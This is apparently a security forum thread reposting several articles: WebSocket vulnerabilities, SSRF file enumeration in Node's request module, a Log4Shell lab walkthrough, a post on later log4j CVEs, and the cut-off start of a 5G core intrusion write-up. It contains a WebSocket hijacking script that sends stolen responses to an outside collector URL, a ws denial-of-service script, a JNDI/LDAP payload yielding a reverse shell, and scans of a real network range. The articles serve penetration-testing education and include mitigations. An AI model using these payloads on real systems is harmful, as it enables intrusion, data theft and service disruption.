    WebSocket-handshake

    Using the shodan.io search engine, it is possible to find WebSocket applications on the Internet. Search Query: Sec-WebSocket-Version

    WebSocket-applications

    Vulnerabilities in WebSocket

    Some vulnerability that occurs in websocket application:

    • Cross-site websocket hijacking
    • Unencrypted communication
    • Denial of service  
    • Input vulnerabilities, etc…

    Cross-Site WebSocket Hijacking:

    Cross-site WebSocket hijacking is also known as cross-origin WebSocket hijacking. It is possible when the server relies only on the session authentication data (cookies) to perform an authenticated action and the origin is not properly checked by the application.

    When users open the attacker-controlled site, a WebSocket is established in the context of the user’s session. Attackers can connect to the vulnerable application using the attacker-controlled domain. Then the attacker can communicate with the server via WebSockets without the victim’s knowledge. Attackers can then communicate with the application through the WebSocket connection and also access the server’s responses.

    A common script that can be used for exploitation of this vulnerability can be found below:

    <script>

      var ws = new WebSocket(‘wss://redacted.com’);

      ws.onopen = function() {

        ws.send(“READY”);

      };

      ws.onmessage = function(event) {

        fetch(‘https://your-collaborator-url’, {method: ‘POST’, mode: ‘no-cors’, body: event.data});

      };

    </script>

    An attacker can observe exfiltrated data in the HTTP interactions request body.

    Vulnerabilities-WebSocket

    Unencrypted Communications:

    WS is a plain-text protocol just like HTTP. The information is transferred through an unencrypted TCP channel, and An attacker can capture and modify the traffic over the network.

    Denial of Service:

    WebSockets allow unlimited connections by default which leads to DOS. The Affected ws package, versions <1.1.5 >=2.0.0 <3.3. The following script can be used to perform DOS attacks on vulnerable applications.

    const WebSocket = require(‘ws’);

    const net = require(‘net’);

    const wss = new WebSocket.Server({ port: 3000 }, function () {

      const payload = ‘constructor’;  // or ‘,;constructor’

      const request = [

        ‘GET / HTTP/1.1’,

        ‘Connection: Upgrade’,

        ‘Sec-WebSocket-Key: test’,

        ‘Sec-WebSocket-Version: 8’,

        Sec-WebSocket-Extensions: ${payload},

        ‘Upgrade: websocket’,

        ‘\r\n’

      ].join(‘\r\n’);

    const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); });

    Input Validation Vulnerabilities:

    Injection attacks occur when an attacker passes malicious input via WebSockets to the application. Some possible kinds of attacks are XSS, SQL injections, code injections, etc.

    Example: Let’s say the application uses Websockets and the attacker passes a malicious input in the UI of the application.

    Input-Validation-Vulnerabilities:

    In this case, the input is HTML-encoded by the client before sending it to the server, but the attacker can intercept the request with a web proxy and modify the input with a malicious payload.

    malicious input

    Observe that input passed by the attacker is executed by the application.

    malicious input

    Mitigation:

    It is recommended to follow the protective measures when implementing the web sockets:

    • Use of encrypted (TLS) WebSockets connection. The URI scheme for it is wss://
    • Checking the ‘Origin’ header of the request. This header was designed to protect against cross origin attacks. If the ‘Origin’ is not trusted, then simply reject the request.
    • Use session-based individual random tokens (just like CSRF-Tokens). Generate them server-side and have them in hidden fields on the client-side and verify them at the request.
    • Input validation of messages using the data model in both directions.
    • Output encoding of messages when they are embedded in the web application.

     

    Conclusion

    Websocket is a bi-directional communication protocol over a single TCP. Websocket helps handle high scale data transfers between server clients. But one has to be careful while using Websocket as it has vulnerabilities like Cross-site WebSocket hijacking, Unencrypted communication, Denial of service, etc. 

    References:

    https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh

    https://cobalt.io/blog/a-pentesters-guide-to-websocket-pentesting

    https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc

    https://portswigger.net/web-security/websockets

    https://www.vaadata.com/blog/websockets-security-attacks-risks

     
    Surendiran S
    An intern security consultant at SecureLayer7, Surendiran always brings some unique ideas to the table. With him having just peeped into security consulting and analysis, he is currently exploring the world of cybersecurity and expanding his scope.
     
    • Upvote 1
  5. Enumerating Files Using Server Side Request Forgery and the request Module

    Written by Adam Baldwin with ♥ on 15 December 2017 in  2 min

    If you ever find Server Side Request Forgery (SSRF) in a node.js based application and the app is using the request module you can use a special url format to detect the existence of files / directories.

    While request does not support the file:// scheme it does supports a special url format to communicate with unix domain sockets and the errors returned from a file existing vs not existing are different.

    The format looks like this. http://unix:SOCKET:PATH and for our purposes we can ignore PATH all together.

    Let’s take this code for example. We’re assuming that as a user we can somehow control the url.

    File exists condition:

     
    1. const Request = require('request')
    2.  
    3. Request.get('[http://unix:/etc/passwd'](http://unix:/etc/passwd'), (err) => {
    4. console.log(err)
    5. })

    As /etc/password exists request will try and use it as a unix socket, of course it is not a unix socket so it will give a connection failure error.

     
    1. { Error: connect **ENOTSOCK** /etc/passwd
    2. at Object._errnoException (util.js:1024:11)
    3. at _exceptionWithHostPort (util.js:1046:20)
    4. at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
    5. code: 'ENOTSOCK',
    6. errno: 'ENOTSOCK',
    7. syscall: 'connect',
    8. address: '/etc/passwd' }

    File does not exist condition:

    Using the same code with a different file that does not exist.

     
    1. const Request = require('request')
    2.  
    3. Request.get('[http://unix:/does/not/exist'](http://unix:/etc/passwd'), (err) => {
    4. console.log(err)
    5. })

    The resulting error looks like this.

     
    1. { Error: connect **ENOENT** /does/not/exist
    2. at Object._errnoException (util.js:1024:11)
    3. at _exceptionWithHostPort (util.js:1046:20)
    4. at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
    5. code: 'ENOENT',
    6. errno: 'ENOENT',
    7. syscall: 'connect',
    8. address: '/does/not/exist' }

    The different is small: ENOTSOCK, vs ENOENT

    While not that severe of an issue on its own it’s a trick that’s help me on past security assessments to enumerate file path locations. Maybe you’ll find it useful too.

    Originally posted on Medium

  6. A Detailed Guide on Log4J Penetration Testing

    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the java logging package, Log4J. This vulnerability has a severity score of 10.0, most critical designation and offers remote code execution on hosts engaging with software that uses log4j utility. This attack has also been called “Log4Shell”.

    Table of Content

    1. Log4jShell
    2. What is log4j
    3. What is LDAP and JNDI
    4. LDAP and JNDI Chemistry
    5. Log4j JNDI lookup
    6. Normal Log4j scenario
    7. Exploit Log4j scenario
    8. Pentest Lab Setup
    9. Exploiting Log4j (CVE-2021-44228)
    10. Mitigation

    Log4jshell

    CVE-2021-44228

    Description: Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

    Vulnerability Type          Remote Code Execution

    Severity                               Critical

    Base CVSS Score               10.0

    Versions Affected           All versions from 2.0-beta9 to 2.14.1

    CVE-2021-45046

    It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments.

    Vulnerability Type          Remote Code Execution

    Severity                               Critical

    Base CVSS Score               9.0

    Versions Affected           All versions from 2.0-beta9 to 2.15.0, excluding 2.12.2

    CVE-2021-45105

    Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack.

    Vulnerability Type          Denial of Service

    Severity                               High

    Base CVSS Score               7.5

    Versions Affected           All versions from 2.0-beta9 to 2.16.0

    What is Log4J.

    Log4j is a Java-based logging utility that is part of the Apache Logging Services. Log4j is one of the several Java logging frameworks which is popularly used by millions of Java applications on the internet.

    What is LDAP and JNDI

    LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol that is used for directory service authentication. It provides the communication language that the application uses to communicate with other directory services. Directory services store lots of important information like, user accounts details, passwords, computer accounts, etc which are shared with other devices on the network.

    JNDI (Java Naming and Directory Interface) is an application programming interface (API) that provides naming and directory functionality to applications written using Java Programming Language.

    AVvXsEgOQnlSvaNMkYa_9XbBIVRzY3gAZO02Tiazjt-WHurkASyfAbapM8rZLIUp9BePvjq-JC2m2nXVX_P6uFVmzsk7pzN9GKxI0wxnzTbU1gS9DrZ-6p89rzFss7OkjN2lVaCvb5korXeNOxJxP5t_917AmPr6HkmTtUl7u0pFC2kMHcIvr4Y83cQ64hhXCQ=s16000

    JNDI and LDAP Chemistry

    JNDI provides a standard API for interacting with name and directory services using a service provider interface (SPI). JNDI provides Java applications and objects with a powerful and transparent interface to access directory services like LDAP. The table below shows the common LDAP and JNDI equivalent operations.

    AVvXsEixvoVo98WtFTc0cozpeknfsNbnEQ6SiaoXw8Q1v7h-YkK6sOMHhwh4V-KmFJoZZzirKqper8PAusLSjIAs9n2ToD9jnspJUaHxqcok0vvjHLarXM_JR4fNhLPm_f5g-qhsWdD3VPYQ3-RoFpYs3ZFn6IQsVTNT1iJb9kETas9T1gzgA-Ljtsj8hrYi4Q=s16000

    Log4J JNDI Lookup

    Lookups are a kind of mechanism that add values to the log4j configuration at arbitrary places. Log4j has the ability to perform multiple lookups such as map, system properties and JNDI (Java Naming and Directory Interface) lookups.

    Log4j uses the JNDI API to obtain naming and directory services from several available service providers: LDAP, COS (Common Object Services), Java RMI registry (Remote Method Invocation), DNS (Domain Name Service), etc. if this functionality is implemented, then we should this line of code somewhere in the program: ${jndi:logging/context-name}

    A Normal Log4J Scenario

    AVvXsEjjRJfgfugQqnMhK2bvwSaURO2kLn9OiUSZYLCVPte_bygG_sqdupugk90QxmJsVRXw85l-uhM_4C4Looo1-BpbpMHH3CxAWQsVr_yyoyllFuTKryCjxgRBVJW2hdz0MN0r9YZPpbEmogkv82Dbn01P9qqs8HmjdSxCvDO08DK7dWhR4FbavyC3pDy4nA=s16000

    The above diagram shows a normal log4j scenario.

    Exploit Log4j Scenario

    An attacker who can control log messages or log messages parameters can execute arbitrary code on the vulnerable server loaded from LDAP servers when message lookup substitution is enabled. As a result, an attacker can craft a special request that would make the utility remotely downloaded and execute the payload.

     Below is the most common example of it using the combination of JNDI and LDAP: ${jndi:ldap://<host>:<port>/<payload>}

    AVvXsEidEMI1h0RBjhmu1XX4W9I6SDgun-awCxYc-AdufginA1EuM0ZWeQYwWmFOI4lxoDgLEfJ76NkqOAFJCR36HoYpoaaHyM1lZgUuiShruKCt1dyJx_fqkIpiGx5jOMwhvDDv1IuLuTZYBvItGJQTF5uPqJnDH_4AyPps51NBMnvkp9H3R_hJ5sTAJFYttA=s16000

    1. An attacker inserts the JNDI lookup in a header field that is likely to be logged.
    2. The string is passed to log4j for logging.
    3. Log4j interpolates the string and queries the malicious LDAP server.
    4. The LDAP server responds with directory information that contains the malicious Java Class.
    5. Java deserialize (or download) the malicious Java Class and executes it.

    Pentest Lab Setup

    In the lab setup, we will use Kali VM as the attacker machine and Ubuntu VM as the target machine. So let’s prepare the ubuntu machine. 

    git clone https://github.com/kozmer/log4j-shell-poc.git

    AVvXsEiz9YBroEqpp0tEMmcYj7iIU8-lhOJXCSL8qGo_cdpyCDHO2z9OguOeS6TKGeklAzhXuMYGF2kOcAI71jLZ-V1sp4p9PBEOR-knZBA3yJxhw7WHOkmeJCkSvlvYDN5LZLoPIlZ_J8GJO60VPEWSGm7-lvHD5Jm2mz3FCyRJQ3kDLVZYctA9LSMCTp_Plg=s16000

    Once the git clone command has been completed, browse to the log4j-shell-poc directory: Once inside that directory, we can now execute the docker command:

    cd log4j-shell-poc
    docker build -t log4j-shell-poc .

    AVvXsEhfG-eMKNkLO0u-QS8BieI9RJfUdKe1f8F82ooq7IQoFlXvCEX5BoaENV-4B3no6VMozRMXiNj-cCILeJNDiIFFoVARHct4XU2Lv1bEUNm1Tn8GW74JDwwq0lAxuL7uFPg74IsYTMxMSrCp8k7CTRBISMeVejwQK9rQq8V_DhpeBtGa1Akx6wFRfimr4g=s16000

    After that, run the second command on the github page:

    docker run --network host log4j-shell-poc

    These commands will enable us to use the docker file with a vulnerable app.

    AVvXsEg6oylSPHEz2ZrD_1mVw6i8E65s0GmYLByUHohMgWHhicDtpRdBulgww-QKvRcgXUy4ysEQQT_IiSGiPx0rmlOpywX9ENuikUvEsppAirEva-DI42mkjvAKnBSHK-qK3P0Pfo69-jTwBNgimDlt2-xYHI_x16UDlbXG601_Cd708KsH2oLuOyYGgKdFMg=s16000

    Once completed, we have our vulnerable webapp server ready. Now let’s browse to the target IP address in our kali’s browser at port 8080.

    AVvXsEjq-2xFO4Ji2yR0JnpncUgfQXxQr7T0oOLcB1mhfWeFPbwmcy8p2uTTIYQWhlNz4AIxNtmgqMNsjrEPG_T-o6M95lW9190j5PkJMv4eFN9oCEtPHx-og8YXpSaAlSN-QNnDsg4ywia80wE8Dr64eyA0UjeTtNOf0cZWlZJE0cmLS2fs35U2TYuPav_NJw=s16000

    So, this is the docker vulnerable application and the area which is affected by this vulnerability is the username field. It is here that we are going to inject our payload. So now, the lab setup is done. We have our vulnerable target machine up and running. Time to perform the attack.

    Exploiting Log4j (CVE-2021-44228)

    On the kali machine, we need to git clone the same repository. So type the following command:

    git clone https://github.com/kozmer/log4j-shell-poc.git

    AVvXsEgrQAMs8GiS5_OAzpA5Z6Jmz8uDW6KiXiHF85x5pUwK9saKR8NO6K7E6oY6m6hPzkaIZNogreRUNFVP8-juULZPWzBFRCRg7rdnYXEUIycBwWM0d9QKTF9hMIb1f3P-JDTQ2QcMPZseFB4xy3wLUgj5Ma9-FHCHLEQfJidvpZISy8F8gv_e1gixAzaYQw=s16000

    Now we need to install the JDK version. This can be downloaded at the following link.

    https://mirrors.huaweicloud.com/java/jdk/8u202-b08/

    Click on the correct version and download that inside the Kali Linux.

    AVvXsEj-kB_-nH_g3MMzwTQjqXGGKD3F0SVU9myzTg-IDQB3UlDXwzySyGjn94QOfmGYSPaUHNCbq0X6p6fuJeSBL-GXtSClZQpQIe4yhpOf3gLlxwyh3abfwuNAgbmROke0A1m5D_TQ-IDBd8uon5iYxM0PdlLrJogR3gBMHne321m4lSzRrvPbOHN4MeXDHg=s16000

    Now go to the download folder and unzip that file by executing the command then move the extracted file to the /usr/bin folder

    tar -xf jdk-8u202-linux-x64.tar.gz
    mv jdk-8u202 /usr/bin
    cd /usr/bin

    AVvXsEiiFs2kREegzw-qqMU2kV5Dei0pS5em_oDbCXPHbHMjdKuSkFy0N_OtLwBEU8J9amZ1bahYTuGmBc8oo4M4m_innx_YKuhdCGA7ypHGGkln6W9B0RwqZd_8WT5Pa7bzjoBXjDlciUZOgZZxeeQjVd_5s1sWtU5L0f66U_zyuZpPtfx1Zba_xM0JJesvhQ=s16000

    Once verified, let’s exit from this directory and browse to the log4j-shell-poc directory. That folder contains a python script, poc.py which we are going to configure as per our lab setup settings. Here you need to modify ‘./jdk1.8.2.20/’ to ‘/usr/bin/jdk1.8.0_202/ as highlighted. what we have done here is we have to change the path of the java location and the java version in the script.

    AVvXsEgaPVvub9rwKmx4hQ1m9_aNSh_HnbYb79klNtuSiw7j-DOic6k4uFLx-LQI7CFLp8J8KqSkG711-PTKLFMY8KGhoHI9mVdatwbu3gW6PtR0PxOI_LBn12QnwC-60AEsxUJGCyHsUupjwmZdSCOXaJVCJ_an7YlWknhdvKCD1z8dtqtwW3RACyS93YUjRQ=s16000

    Now that all changes have been made, we need to save the file and get ready to start the attack. In attacker machine, that is the Kali Linux, we will access the docker vulnerable webapp application inside a browser by typing the IP of the ubuntu machine:8080

    Now let’s initiate a netcat listener and start the attack.

    AVvXsEig0sLXy4Tzk52oCUKcnt57OgpkMcxyJqOubDGExUISZ3LDaqrG0PcOoGy4XKhS-qcLSyLctj_dkxm98Ga2pWuqTMkl8eRDWU9CxGoC9ZPe4sJz4pOX5oHRUNwMQ19yu8y5SFzPBf3t8dK5NzdEKBPNVMAfr5KfdG4eeHq642BljHJbOW-0gBZ_gdQU9A=s16000

    Type the following command

    python3 poc.py --userip 192.168.29.163 --webport 8000 --lport 9001

    in a terminal. Make sure you are in the log4j-shell-poc directory when executing the command.

    AVvXsEiarK268hBuH7J1-jl8X8EVvMpg7PYZlpOZHY8YzeGpUebfw4d-qScofSvkv2EYGyObcB7gBoniu3Cig-_i4EictJH_s9lKIgkKd1rNDLyGs4rkf2hNp7U1415j4qc7Puwb-RUwRd4e7rtVsqBNK6nV-disuSJPAgE4t0NgtQF4oXEpjl8grgEPg7lWKg=s16000

    This script started the malicious local LDAP server.

    Now let Copy the complete command after send me:

    ${jndi:ldap://192.168.29.163:1389/a}

    paste it inside the browser in the username field. This will be our payload. In the password field, you can provide anything.

    AVvXsEhAdQl_O-rdemi_dQx-ok4O9HuEU2nyMRQyelumL2pFXYy1QQ8531Mv8giLb4Qxr811L1vo9YE8mC7tl-SUTmKtGqDRht3xGP6dAWEZ0Pxj55pFLCX8DKthZrx78sJcvVaeFpvJpPLcoJW5UjQ6yYOvrRXWAcNB98WCIv72tWn0b0Jp3Ab12Z6h8lw8gw=s16000

    Click on the login button to execute the payload. Then switch to the netcat windows where we should get a reverse shell.

    AVvXsEjF3wNOYmoFhs_PCcPj4We37Ps-bUsRxZGt-DCjax18sTMRQA0ufYRPoavAEomKY7c-FLfikHQNvk8-hcQqlzfGhv1p_6mmWrd_b7z5PfQAvfJ71N39fTlKiCQFFe3RtCw_hIzANeoHSaeaDsb5QhlF_wdOUIUU0lz6LGhxxlt6pklEKdTNShFuhD58qA=s16000

    We are finally inside that vulnerable webapp docker image.

    Mitigation

    CVE-2021-44228: Fixed in Log4j 2.15.0 (Java 😎

    Implement one of the following mitigation techniques:

    • Java 8 (or later) users should upgrade to release 2.16.0.
    • Java 7 users should upgrade to release 2.12.2.
    • Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
    • Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2

    CVE-2021-45046: Fixed in Log4j 2.12.2 (Java 7) and Log4j 2.16.0 (Java 😎

    Implement one of the following mitigation techniques:

    • Java 8 (or later) users should upgrade to release 2.16.0.
    • Java 7 users should upgrade to release 2.12.2.
    • Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
    • Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2.

    CVE-2021-45105: Fixed in Log4j 2.17.0 (Java 😎

    Implement one of the following mitigation techniques:

    • Java 8 (or later) users should upgrade to release 2.17.0.
    • In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
    • Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.

    To read more about mitigation, you can access the following  link https://logging.apache.org/log4j/2.x/security.html

    Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. Can be Contacted on LinkedIn

     

    Sursa: https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/

    • Upvote 3
  7. The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think

    Attacks against 2.15 and the CLI fix require a non-standard logging config

    By DANIEL MIESSLER in INFORMATION SECURITY
    CREATED/UPDATED: DECEMBER 18, 2021

    Home / Information Security / The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think

     

    log4j non default

    If you’re reading this you’re underslept and over-caffeinated due to log4j. Thank you for your service.

    I have some good news.

    I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know.

    Once you have 2.15 applied—or the CLI implementation to disable lookups—you actually need a non-default log4j2.properties configuration to still be vulnerable!

    Read that again.

    The bypasses of 2.15 and the NoLookups CLI change don’t affect people unless they have non-defalt logging configurations. From the Apache advisory:

    It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern. apache project security advisory

    “Certain non-default configurations”. I’ve never heard a sweeter set of syllables.

    These can also be set in log4j2.xml or programatically.

    So you need to have changed your configs to include patterns like:

     

    $${ctx:loginId}
    ${ctx
    ${event
    ${env
    

     

    …etc to be vulnerable to a 2.15 patch level or a log4j2.formatMsgNoLookups or LOG4J_FORMAT_MSG_NO_LOOKUPS = true bypass!

    That’s huge! And Nate figured this out like 4 days ago!

     

     

    He mentioned to me multiple times this wasn’t as bad as people thought, but he wasn’t shouting from the rooftops so I didn’t listen well enough. Shame on me.

    He also happens to have a strong meme game.

     

     

    Summary

    1. The first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration.
    2. But if you are patched to 2.15, or mitigated with the NoLookup config, you are no longer vulnerable unless you ALSO have a logging config option set in your log4j2.properties file that re-enables them.
    3. So, if you’re already patched to 2.15 and/or have the mitigation in place, and don’t have non-standard configs—which you should confirm—you might be able to sleep for a bit.
    4. And of course of course—keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast.
    5. Finally, d0nut is awesome and you should follow his work.

    Notes

    1. This also applies to the DoS that 2.17 addresses.
    2. Thanks to Nate for the great find!

     

     

    divider.png

     

    Written By Daniel Miessler

    Daniel Miessler is a cybersecurity leader, writer, and founder of Unsupervised Learning. He writes about security, tech, and society and has been featured in the New York Times, WSJ, and the BBC.

     

    Sursa: https://danielmiessler.com/blog/the-second-wave-of-log4j-vulnerabilities-werent-nearly-as-bad-as-people-think/

  8. Intruding 5G core networks from outside and inside

     

    5G installations are becoming more present in our life, and will introduce significant changes regarding the traffic demand growing with time. The development of the 5G will is not only an evolution in terms of speed, but also tends to be adapted in a lot of contexts: medical, energy, industries, transportation, etc. In this article, we will briefly present introduce the 5G network, and take as an example the assessment we did with the DeeperCut team to place 3rd on the PwC & Aalto 5G Cybersecurity challenge to introduce possible attacks, but also the tools we developed at Penthertz.

     

    Introduction

    In 2019, a part of our team had the chance to participate and win the "Future 5G Hospital intrusion" challenge of the 5G Cyber Security Hack 2019 edition. This edition was the opportunity to perform intrusion tests in a 5G Non-Standalone Access (NSA) network, which is the kind of network that is currently in use everywhere, from a 5G-NR interface using a provided ISIM card. Details of our intrusion have been documented in a more generic way and were published in Medium.

    This year, we had once again the opportunity to play freely with some 5G network products, and build a new team called "The Deeper Cuts" was composed of Alexandre De Oliveira, Dominik Maier, Marius Muench, Shinjo Park, and myself. Our team applied to the PwC & Aalto challenge which looked really complete for us on the paper, as it was not only looking for vulnerability in a commercial product but a complete network architecture. After 24h, we have been able to play with a lot of assets, discover some future attack vectors that will appear as soon as 5G-NR SA will be in production, but after this challenge we continued experimenting with testbed 5G Core Network to develop our tools.

    In this article, we will briefly remind the two types of 5G networks, and then focus on different scenarios starting from the outside and then looking inside the core network, discussing classic vulnerabilities we can encounter during a security engagement. In this article, we will also introduce one of the tools we made to attack this new type of network.

     

    Mobile network

    5G NSA and SA (remindings)

    Two kinds of architectures are known for the 5G networks:

    • SA (StandAlone);
    • NSA (Non-StandAlone).

    At the time of this article, only NSA is largely deployed and it is rare to see a SA in production available to the public. We can probably expect the SA network to be deployed only in mid-2022 if everything goes right.

    If we make some reminding, the commercial 5G network deployment utilizes the NSA mode and shares the same Core network as LTE, known as NSA LTE assisted NR:

    Heterodyne process
    5G NSA architectures (Source: 3GPP)

    Technically, the same Evolved Packet Core (EPC) is used between 4G and 5G which does not make big changes apart from the radio side where 5G-NR use up to 1024-Quadrature Amplitude Modulation (QAM), supports channels up to 400 MHz, and also with a greater number of subcarriers compared to 4G. But in the end, the final user will still find some speed limitations due to the use of the 4G network shared with 4G antennas.

    In SA, things are going to change completely in the core as a Next-Generation Core Network (NGCN) with replacing the EPC:

    Heterodyne process
    5G SA architectures (Source: 3GPP)

    This new type of network might be able to support very fast connectivity, and a lot of different applications thanks to new concepts such as the Network Function Virtualization (NFV), the splitting of the data and control planes with Software Defined Network (SDN), and the Network Slicing (NS).

    Regarding the NFV in the upcoming 5G-NR SA architecture, the 3GPP opted for a Service-Based Architecture (SBA) approach for the control plane, where services use HTTP/2. The interfaces between the User Equipment (UE) and the core (N1), the network and the core (N2 and N3), as well as the user plan still use a point-to-point link as shown in the following picture.

    Heterodyne process
    SBA architecture of a 5GC

    Generally, once the standards are frozen, the mobile network is rarely upgraded. This could be observed with 2G and 3G, but in 4G a lot of arrived for Machine Type Communications (MTC) and Internet of Things (IoT) applications. As a consequence, the 4G networks had to be updated with a new entity introduced by 3GPP: MTC-IWF (MTC Interworking Function).

    Its new architecture makes 5G core networks more flexible. The SBA model allows having two roles that can be played in software:

    • a provider of services;
    • and a consumer.

    All functions are connected together via an integration BUS using the REST API, and can be updated or deleted, but also reused in another context. Each function as a purpose.

    The User Plane Function (UPF) linked to the gNB is used to connect subscribers to the internet through the Data Network (DN). This function is connected to the Session Management Function (SMF) responsible for managing sessions, but also to handle the tunnel between the access network and the UPF, the selection of the UPF gateway to use, IP addresses allocations and interaction with the Policy Control Function (PCF). The PCF is here applies policy rules to the User Equipment (UE) using data from the Unified Data Repository which stores and allows extracting subscribers' data.

    The Access and Mobility Management Function (AMF) handles:

    • subscriber registration;
    • NAS (Non-Access Stratum) signalling exchange on the N1 interface;
    • subscriber connection management, and subscriber location management.

    The management of user profiles is made by the User Data Management (UDM) and is also used to generate authentication credentials. To authenticate users for 3GPP and non-3GPP accesses, an Authentication Server Function (AUSF) is available.

    The Policy Control Function (PCF) assigns rules to the UE data from the Unified Data Repository (UDR).

    A UE is assigned a slide depending on its type, location, and other parameters defined in the Network Slide Selection Function (NSSF)

    To discover all these instances, a Network Repository Function (NRF) is available and all functions are communicating with it to update their status. We will see that this component reveals to be very interesting during an attack.

    Note that before this post, the NCC group previously published about a stack-overflow vulnerability they found in the UPF of the Open5GS stack. Their publication is interesting as it shows that memory corruptions can happen in these new 5GC networks, and it may be part of another post in this blog, or a YouTube video in our channel.

     

    Attack plan

    To illustrate possible attacks, we will give the example of the 5G Cybersecurity challenge 5GNC architecture provided by PwC & Aalto:

    Heterodyne process
    Aalto & PwC challenge architecture

    This architecture includes a real gNB where the targets were connected in 5G-NR. The staff also let us have a playground core to get familiar with the architecture with SSH accesses. To get the feedback of LED status in real-time, the targets were streamed on a YouTube channel.

    To complete the challenge, organizers provided our generated SSH keys to connect the 5G core network. From there, we had could directly interact with the different exposed entities, but to make things a little spicier, our team also wanted to take it in a redder team approach:

    • fingerprinting the range of the provided public address associated with the 5G core network;
    • discover many exposed hosts with opened services;
    • exploiting web vulnerabilities among opened services;
    • taking 5G core network access to assess Network Functions (NF);
    • deploying a fake NF;
    • others?

    In this challenge, a proprietary 5G core network written in Go was used.

    Let us now see the different steps we took to intrude on this network.

     

    Exposed services

    Even if we were first granted to the playground 5G core network to get familiar with the 5G SA architecture, our team proceeded with some extra fingerprinting to see if they could directly join the 5G core network in production.

    Reverse lookup

    To do so, we took the public IP address, and just reverse looked for other ranges that would be part of the infrastructure. That way we would quickly figure out that one range proper to FI-TKK****-NET could be an interesting beginning:

    whois 195.148.**.**    
    [...]
    
    inetnum:        195.148.***.0 - 195.148.***.255
    netname:        FI-TKK****-NET
    descr:          TKK Comnet
    country:        FI
    admin-c:        MP14***-RIPE
    tech-c:         MP14***-RIPE
    status:         ASSIGNED PA
    mnt-by:         AS17**-MNT
    created:        2009-02-13T10:44:24Z
    last-modified:  2009-02-13T10:44:24Z
    source:         RIPE
    
    person:         Markus P********
    address:        Helsinki University of Technology
    address:        TKK/TLV
    address:        P.O.Box 3000
    address:        FIN-02015 TKK  Finland
    phone:          ****************
    nic-hdl:        MP14***-RIPE
    mnt-by:         AS17**-MNT
    created:        2009-02-13T10:37:57Z
    last-modified:  2017-10-30T22:04:40Z
    source:         RIPE # Filtered
    

    After that, we started scanning this whole range and discover many hosts, including interesting hostnames as follows:

    • 5GC1.research.*.aalto.fi (195.148..***);
    • 5GC2.research.*.aalto.fi (195.148..***).

    Among these hosts, we could also find some other hosts but probably out-of-the-scope as their aim is to test drones and VR/AR. So we have decided to only focus on these two hosts primarily.

    Exposed web interfaces

    The two interfaces we focused on seemed to have an interesting exposed interface at port TCP 3000 for both hosts and a TCP 5050 interface for IP 195.148.*. as follows:

    Nmap scan report for 5GC1.research.****.aalto.fi (195.148.***.***)
    Host is up (0.044s latency).
    Not shown: 997 closed ports
    PORT     STATE    SERVICE  VERSION
    [...]
    3000/tcp open     ssl/http Node.js (Express middleware)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: EPC USER INTERFACE
    | ssl-cert: Subject: commonName=www.localhost.com/organizationName=c****core/stateOrProvinceName=ESPOO/countryName=FI
    | Issuer: commonName=www.localhost.com/organizationName=c***core/stateOrProvinceName=ESPOO/countryName=FI
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-01-10T08:20:47
    | Not valid after:  2020-02-09T08:20:47
    | MD5:   3bea 59c5 d273 8e76 943e 5da1 ca0f 2040
    |_SHA-1: f5fc 11d5 489e b5a9 27e3 66b7 386e 05e0 5b79 78ea
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    [...]
    Nmap scan report for rs-122.research.*****.****.fi (195.148.***.***)
    Host is up (0.044s latency).
    Not shown: 996 closed ports
    PORT     STATE    SERVICE  VERSION
    22/tcp   open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
